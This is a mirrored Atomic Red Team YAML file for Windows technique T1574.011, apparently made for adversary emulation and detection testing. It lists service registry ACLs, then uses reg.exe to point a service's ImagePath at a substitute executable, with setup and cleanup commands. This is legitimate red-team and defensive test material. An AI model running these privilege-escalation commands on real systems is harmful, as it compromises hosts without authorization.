security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1574.011/T1574.011.yaml
T
frack113 a7e5260a93 Add reg.exe force swith (#2477) 
Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>
2023-07-11 20:36:53 -06:00

54 lines
2.0 KiB
YAML
Raw Permalink Blame History

attack_technique: T1574.011
display_name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service check
type: string
default: weakservicename
executor:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
name: powershell
- name: Service ImagePath Change with reg.exe
auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
description: |
Change Service registry ImagePath of a bengin service to a malicious file
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service name
type: string
default: calcservice
weak_service_path:
description: weak service path
type: string
default: '%windir%\system32\win32calc.exe'
malicious_service_path:
description: malicious service path
type: string
default: '%windir%\system32\cmd.exe'
dependency_executor_name: powershell
dependencies:
- description: |
The service must exist (#{weak_service_name})
prereq_command: |
if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
get_prereq_command: |
sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
executor:
command: |
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
cleanup_command: |
sc.exe delete #{weak_service_name}
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink